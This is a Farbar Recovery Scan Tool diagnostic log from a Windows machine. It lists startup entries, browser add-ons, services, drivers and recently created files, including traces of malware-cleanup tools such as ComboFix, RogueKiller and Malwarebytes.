Startup: C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => No File
ShellIconOverlayIdentifiers: [EnabledUnlockedFDEIconOverlay] -> {30D3C2AF-9709-4D05-9CF4-13335F3C1E4A} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)
ShellIconOverlayIdentifiers: [uninitializedFdeIconOverlay] -> {CF08DA3E-C97D-4891-A66B-E39B28DD270F} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)
BootExecute: autocheck autochk * bootdelete
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xCB8CB9EA9BF7CF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1619941995-4271792153-444280415-1167\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1619941995-4271792153-444280415-3256\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM - DefaultScope {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM - {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM-x32 - DefaultScope {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKCU - DefaultScope {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL =
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation)
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL (Microsoft Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: WebEx Productivity Tools -> {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} -> C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli.dll (Cisco WebEx LLC)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - WebEx Productivity Tools - {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} - C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli.dll (Cisco WebEx LLC)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL (Microsoft Corporation)
Winsock: Catalog5 10 C:\Program Files (x86)\National Instruments\Shared\mDNS Responder\nimdnsNSP.dll [24320] (National Instruments Corporation)
Winsock: Catalog5-x64 10 C:\Program Files\National Instruments\Shared\mDNS Responder\nimdnsNSP.dll [26368] (National Instruments Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.5 192.168.1.6
FireFox:
========
FF ProfilePath: C:\Users\bcostello\AppData\Roaming\Mozilla\Firefox\Profiles\fxbxrcay.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()
FF Plugin: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.10411.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nplv2011win32.dll (National Instruments)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nplv2012win32.dll (National Instruments)
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2013-02-20]
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird
FF Extension: ESET Smart Security Extension - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2013-03-15]
Chrome:
=======
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
S3 c2wts; C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe [15768 2010-02-02] (Microsoft Corporation)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2436280 2014-09-25] (Microsoft Corporation)
R2 CrmSqlStartupSvc; C:\Program Files (x86)\Microsoft Dynamics CRM\Client\bin\CrmSqlStartupSvc.exe [23400 2012-01-16] (Microsoft Corporation)
R2 DcomLaunch; C:\Windows\system32\rpcss.dll [524288 2014-06-03] (Microsoft Corporation) [File not signed]
S3 EhttpSrv; C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe [42360 2010-08-12] (ESET)
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [810144 2010-08-12] (ESET)
R2 EmbassyService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe [225720 2012-11-20] ()
R2 L4301_Solar; C:\Program Files\Logitech\SolarApp\L4301_Solar.exe [405744 2013-01-30] (Logitech, Inc.)
R2 LkCitadelServer; C:\Windows\SysWOW64\lkcitdl.exe [695136 2010-10-27] (National Instruments, Inc.)
R2 lkClassAds; C:\Windows\SysWOW64\lkads.exe [50328 2012-11-28] (National Instruments Corporation)
R2 lkTimeSync; C:\Windows\SysWOW64\lktsrv.exe [60568 2012-11-28] (National Instruments Corporation)
R2 msoidsvc; C:\Program Files\Common Files\Microsoft Shared\Microsoft Online Services\MSOIDSVC.EXE [2060192 2011-04-28] (Microsoft Corp.)
R2 mxssvr; C:\Program Files (x86)\National Instruments\MAX\nimxs.exe [51360 2012-11-21] (National Instruments Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [272688 2012-08-23] ()
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-01-18] (Hewlett-Packard) [File not signed]
R2 NIApplicationWebServer; C:\Program Files (x86)\National Instruments\Shared\NI WebServer\ApplicationWebServer.exe [54472 2012-11-30] (National Instruments Corporation)
S4 NIApplicationWebServer64; C:\Program Files\National Instruments\Shared\NI WebServer\ApplicationWebServer.exe [76488 2012-11-30] (National Instruments Corporation)
R2 NIDomainService; C:\Program Files (x86)\National Instruments\Shared\Security\nidmsrv.exe [371352 2012-11-28] (National Instruments Corporation)
S3 NILM License Manager; C:\Program Files (x86)\National Instruments\Shared\License Manager\Bin\lmgrd.exe [1427688 2010-08-02] (Macrovision Corporation)
R2 nimDNSResponder; C:\Program Files (x86)\National Instruments\Shared\mDNS Responder\nimdnsResponder.exe [258776 2012-09-26] (National Instruments Corporation)
R2 NINetworkDiscovery; C:\Program Files (x86)\National Instruments\Shared\NI Network Discovery\niDiscSvc.exe [172344 2012-12-18] (National Instruments Corporation)
R2 niSvcLoc; C:\Program Files (x86)\National Instruments\Shared\NI WebServer\SystemWebServer.exe [54464 2012-11-30] (National Instruments Corporation)
R2 NITaggerService; C:\Program Files (x86)\National Instruments\Shared\Tagger\tagsrv.exe [680624 2012-06-07] (National Instruments Corporation)
R2 O2FLASH; C:\Windows\system32\o2flash.exe [244328 2011-11-16] (O2Micro International)
R2 PbaDrvSvc_x64; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\hapi64\pbadrvsvc.exe [20480 2012-11-23] () [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-01-18] (Hewlett-Packard) [File not signed]
R2 RpcSs; C:\Windows\system32\rpcss.dll [524288 2014-06-03] (Microsoft Corporation) [File not signed]
S2 tcsd_win32.exe; C:\Program Files (x86)\Security Innovation\SI TSS\bin\tcsd_win32.exe [1643520 2012-05-11] () [File not signed]
R2 Wave Authentication Manager Service; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe [1758720 2012-11-19] (Wave Systems Corp.) [File not signed]
S2 WvPCR; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Common\WvPCR.exe [254384 2012-11-08] (Wave Systems Corp.)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3342640 2012-08-23] (Intel® Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 dcdbas; C:\Windows\System32\DRIVERS\dcdbas64.sys [39016 2012-09-23] (Dell Inc.)
R2 DgiVecp; C:\Windows\system32\Drivers\DgiVecp.sys [53816 2010-01-21] (Samsung Electronics Co., Ltd.)
R2 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [168544 2010-07-29] (ESET)
R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [141264 2010-07-29] (ESET)
R2 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [126320 2010-07-29] (ESET)
R1 nvkflt; C:\Windows\System32\DRIVERS\nvkflt.sys [300320 2013-12-04] (NVIDIA Corporation)
R3 ST_ACCEL; C:\Windows\System32\DRIVERS\ST_ACCEL.sys [68208 2012-05-21] (STMicroelectronics)
R3 usb3Hub; C:\Windows\System32\DRIVERS\usb3Hub.sys [47072 2012-10-09] (Windows ® Win 7 DDK provider)
S3 wbfcvusbdrv; C:\Windows\System32\Drivers\wbfcvusbdrv.sys [16008 2012-10-24] ()
R3 XHCIPort; C:\Windows\System32\DRIVERS\XHCIPort.sys [188896 2012-10-09] (Windows ® Win 7 DDK provider)
S3 KAPFA; \??\C:\Windows\system32\drivers\KAPFA.SYS [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)
2014-11-04 10:01 - 2014-11-04 10:01 - 00024053 _____ () C:\Users\rbecker\Desktop\FRST.txt
2014-11-04 09:54 - 2014-11-04 09:59 - 02114560 _____ (Farbar) C:\Users\rbecker\Desktop\FRST64.exe
2014-11-04 09:29 - 2014-11-04 09:29 - 00004035 _____ () C:\Users\bcostello\Desktop\RKreport_SCN_11042014_092846.log
2014-11-04 09:23 - 2014-11-04 09:25 - 00037624 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-11-04 09:23 - 2014-11-04 09:23 - 17526360 _____ () C:\Users\bcostello\Desktop\RogueKillerX64.exe
2014-11-04 09:23 - 2014-11-04 09:23 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-11-04 09:20 - 2014-11-04 09:20 - 00001471 _____ () C:\Users\bcostello\Desktop\mbamreport.txt
2014-11-04 09:10 - 2014-11-04 09:10 - 00001104 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-11-04 09:09 - 2014-11-04 09:09 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\bcostello\Downloads\mbam-setup-2.0.3.1025.exe
2014-11-03 16:44 - 2014-11-03 16:44 - 00046148 _____ () C:\Users\bcostello\Desktop\Addition.txt
2014-11-03 16:44 - 2014-11-03 16:44 - 00036389 _____ () C:\Users\bcostello\Desktop\FRST.txt
2014-11-03 16:42 - 2014-11-03 16:42 - 02114560 _____ (Farbar) C:\Users\bcostello\Downloads\FRST64(1).exe
2014-11-03 16:41 - 2014-11-03 16:41 - 02114560 _____ (Farbar) C:\Users\bcostello\Desktop\FRST64.exe
2014-11-03 16:41 - 2014-11-03 16:41 - 00000000 ____D () C:\Users\bcostello\AppData\Local\Macromedia
2014-11-03 15:54 - 2014-11-03 15:54 - 02347384 _____ (ESET) C:\Users\bcostello\Downloads\esetsmartinstaller_enu(1).exe
2014-11-03 15:35 - 2014-11-03 15:35 - 02347384 _____ (ESET) C:\Users\bcostello\Downloads\esetsmartinstaller_enu.exe
2014-11-03 15:35 - 2014-11-03 15:35 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-11-03 15:13 - 2014-11-04 09:09 - 00003056 _____ () C:\Windows\System32\Tasks\Defrag
2014-11-03 15:13 - 2014-11-04 09:09 - 00000232 _____ () C:\Windows\Tasks\Defrag.job
2014-11-03 14:49 - 2014-11-03 14:49 - 00030010 _____ () C:\ComboFix.txt
2014-11-03 14:41 - 2014-11-03 14:50 - 00000000 ____D () C:\ComboFix
2014-11-03 14:41 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-11-03 14:41 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-11-03 14:41 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-11-03 14:41 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-11-03 14:41 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-11-03 14:41 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-11-03 14:41 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-11-03 14:41 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-11-03 14:40 - 2014-11-03 14:50 - 00000000 ____D () C:\Qoobox
2014-11-03 14:40 - 2014-11-03 14:48 - 00000000 ____D () C:\Windows\erdnt
2014-11-03 14:25 - 2014-11-03 14:25 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Macromedia
2014-11-03 14:12 - 2014-11-03 14:12 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\WinRAR
2014-11-03 14:00 - 2014-11-03 14:48 - 00000000 ____D () C:\Windows\SysWOW64\NV
2014-11-03 14:00 - 2014-11-03 14:48 - 00000000 ____D () C:\Windows\system32\NV
2014-10-31 12:22 - 2014-11-04 09:45 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-31 12:22 - 2014-11-04 09:10 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-31 12:22 - 2014-11-04 09:10 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-31 12:22 - 2014-10-31 12:22 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-31 12:22 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-31 12:22 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-31 12:22 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-31 12:21 - 2014-10-31 12:21 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\rbecker\Downloads\mbam-setup-2.0.3.1025.exe
2014-10-31 09:13 - 2014-10-31 09:13 - 00001161 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2014-10-31 09:13 - 2014-10-31 09:13 - 00000000 ____D () C:\ProgramData\Mozilla
2014-10-31 09:13 - 2014-10-31 09:13 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-10-31 09:12 - 2014-10-31 09:12 - 00244032 _____ () C:\Users\rbecker\Downloads\Firefox Setup Stub 33.0.2.exe
2014-10-31 09:09 - 2014-10-31 09:13 - 00000000 ____D () C:\Users\rbecker\AppData\Local\Mozilla
2014-10-31 09:09 - 2014-10-31 09:09 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Mozilla
2014-10-31 09:09 - 2014-10-31 09:09 - 00000000 ____D () C:\Users\rbecker\AppData\Local\Macromedia
2014-10-22 07:49 - 2014-10-22 07:49 - 00002345 _____ () C:\Users\rbecker\Desktop\OneNote 2013.lnk
2014-10-22 07:48 - 2014-10-22 07:48 - 00002403 _____ () C:\Users\rbecker\Desktop\Word 2013.lnk
2014-10-22 07:48 - 2014-10-22 07:48 - 00002402 _____ () C:\Users\rbecker\Desktop\PowerPoint 2013.lnk
2014-10-22 07:48 - 2014-10-22 07:48 - 00002366 _____ () C:\Users\rbecker\Desktop\Access 2013.lnk
2014-10-22 07:46 - 2014-10-22 07:46 - 00002365 _____ () C:\Users\rbecker\Desktop\Excel 2013.lnk
2014-10-22 07:46 - 2014-10-22 07:46 - 00002359 _____ () C:\Users\rbecker\Desktop\Outlook 2013.lnk
2014-10-22 07:36 - 2014-10-22 07:36 - 00000000 ____D () C:\Users\rbecker\AppData\Local\VirtualStore
2014-10-21 13:26 - 2014-10-21 13:26 - 00000000 ____D () C:\Users\rbecker\Documents\OneNote Notebooks
2014-10-21 11:43 - 2014-10-21 11:43 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Macromedia
2014-10-21 11:11 - 2014-10-21 11:11 - 00000000 ____D () C:\Users\rbecker\AppData\Local\Apple
2014-10-21 11:09 - 2014-10-21 11:09 - 00000000 ___RD () C:\MSOCache
2014-10-21 11:03 - 2014-10-21 11:03 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Apple Computer
2014-10-21 11:00 - 2014-10-21 12:35 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Adobe
2014-10-21 11:00 - 2014-10-21 12:34 - 00000000 ____D () C:\Users\rbecker\AppData\Local\Adobe
2014-10-21 11:00 - 2014-10-21 11:00 - 00112248 _____ () C:\Users\rbecker\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-21 11:00 - 2014-10-21 11:00 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Creative
2014-10-21 11:00 - 2014-10-21 11:00 - 00000000 ____D () C:\Users\rbecker\AppData\Local\National Instruments
2014-10-21 10:59 - 2014-10-21 10:59 - 00001411 _____ () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-10-21 10:58 - 2014-11-04 09:01 - 00003856 __RSH () C:\Users\rbecker\ntuser.pol
2014-10-21 10:58 - 2014-11-04 09:01 - 00000000 ____D () C:\Users\rbecker
2014-10-21 10:58 - 2014-10-21 10:59 - 00001445 _____ () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-21 10:58 - 2014-10-21 10:58 - 00000020 ___SH () C:\Users\rbecker\ntuser.ini
2014-10-21 10:58 - 2014-10-21 10:58 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Intel
2014-10-21 10:58 - 2013-03-14 10:42 - 00002102 _____ () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft SkyDrive.lnk
2014-10-21 10:58 - 2009-07-13 23:54 - 00000000 ___RD () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-21 10:58 - 2009-07-13 23:49 - 00000000 ___RD () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-21 10:49 - 2014-11-03 15:35 - 00000000 ____D () C:\Users\bcostello\AppData\Local\Mozilla
2014-10-21 10:49 - 2014-10-21 10:49 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Mozilla
2014-10-20 13:53 - 2014-10-20 13:53 - 00012872 _____ (SurfRight B.V.) C:\Windows\SysWOW64\bootdelete.exe
2014-10-20 13:53 - 2014-10-20 13:53 - 00000190 _____ () C:\Windows\SysWOW64\bootdelete.lst
2014-10-20 13:52 - 2014-10-31 09:06 - 00030616 _____ () C:\Windows\SysWOW64\Drivers\hitmanpro37.sys
2014-10-20 13:49 - 2014-10-20 13:49 - 00000000 ____D () C:\Program Files\HitmanPro
2014-10-20 13:46 - 2014-10-20 13:46 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-10-20 13:46 - 2014-10-20 13:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-10-20 13:46 - 2014-10-20 13:46 - 00000000 ____D () C:\Program Files\WinRAR
2014-10-20 13:33 - 2014-10-20 13:53 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-10-17 15:11 - 2014-11-04 10:01 - 00000000 ____D () C:\FRST
2014-10-17 11:41 - 2014-11-03 14:25 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Adobe
2014-10-17 11:41 - 2014-10-17 11:41 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Creative
2014-10-17 11:41 - 2014-10-17 11:41 - 00000000 ____D () C:\Users\bcostello\AppData\Local\National Instruments
2014-10-17 11:41 - 2014-10-17 11:41 - 00000000 ____D () C:\Users\bcostello\AppData\Local\Adobe
2014-10-17 11:40 - 2014-10-17 11:40 - 00001411 _____ () C:\Users\bcostello\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-10-17 11:39 - 2014-10-17 11:40 - 00001445 _____ () C:\Users\bcostello\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-17 11:39 - 2014-10-17 11:39 - 00002558 __RSH () C:\Users\bcostello\ntuser.pol
2014-10-17 11:39 - 2014-10-17 11:39 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Intel
2014-10-17 11:39 - 2014-10-17 11:39 - 00000000 ____D () C:\Users\bcostello\AppData\Local\VirtualStore
2014-10-17 10:38 - 2014-10-17 10:38 - 00000000 ____D () C:\Users\bcostello\Documents\Audible
2014-10-17 10:36 - 2014-10-17 10:36 - 00000000 ____D () C:\Windows\pss

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-04 10:00 - 2014-10-01 10:43 - 00005014 _____ () C:\Windows\System32\Tasks\WSCEAA
2014-11-04 09:43 - 2013-03-14 10:17 - 00000112 _____ () C:\Windows\system32\config\netlogon.ftl
2014-11-04 09:15 - 2009-07-13 23:45 - 00021312 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-04 09:15 - 2009-07-13 23:45 - 00021312 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-04 09:12 - 2013-02-20 15:12 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-04 09:12 - 2009-07-14 00:13 - 00785022 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-04 09:09 - 2013-03-14 10:18 - 00017315 __RSH () C:\ProgramData\ntuser.pol
2014-11-04 09:08 - 2014-01-09 08:58 - 00041891 _____ () C:\Windows\setupact.log
2014-11-04 09:08 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-04 09:07 - 2013-02-20 15:12 - 01748052 _____ () C:\Windows\WindowsUpdate.log
2014-11-04 09:02 - 2013-09-10 09:03 - 00004978 _____ () C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for {3cb986d6-91c6-4e57-9f69-11185dadd832} ADC69.adc.com
2014-11-03 17:33 - 2013-09-12 09:26 - 00000072 _____ () C:\Users\Public\LMDebug.log
2014-11-03 15:10 - 2014-01-10 08:55 - 00449262 _____ () C:\Windows\PFRO.log
2014-11-03 14:50 - 2009-07-13 22:20 - 00000000 __RHD () C:\Users\Default
2014-11-03 14:48 - 2009-07-13 21:34 - 00000215 _____ () C:\Windows\system.ini
2014-11-03 14:47 - 2009-07-13 21:34 - 92012544 _____ () C:\Windows\system32\config\SOFTWARE.bak
2014-11-03 14:47 - 2009-07-13 21:34 - 19136512 _____ () C:\Windows\system32\config\SYSTEM.bak
